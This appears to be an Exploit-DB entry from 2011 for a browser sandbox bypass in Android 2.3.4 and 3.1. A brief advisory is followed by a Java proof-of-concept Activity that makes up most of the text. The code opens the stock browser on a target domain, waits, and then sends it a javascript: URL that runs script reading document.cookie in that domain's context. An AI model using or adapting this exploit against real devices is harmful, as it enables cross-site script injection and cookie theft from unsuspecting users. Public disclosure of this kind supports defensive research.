Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass

EDB-ID:

36006


Author:

Roee Hay

Type:

remote


Platform:

Multiple

Date:

2011-08-02


source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox.

Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain.

Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected. 

public class CasExploit extends Activity
{
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";;
   static final String mJavascript = "alert(document.cookie)";
   static final int mSleep = 15000;

   @Override
   public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      startBrowserActivity(mUrl);
         try {
             Thread.sleep(mSleep);
         }
         catch (InterruptedException e) {}
         startBrowserActivity("javascript:" + mJavascript);
   }

   private void startBrowserActivity(String url) {
      Intent res = new Intent("android.intent.action.VIEW");
      res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
      res.setData(Uri.parse(url));
      startActivity(res);
   }
}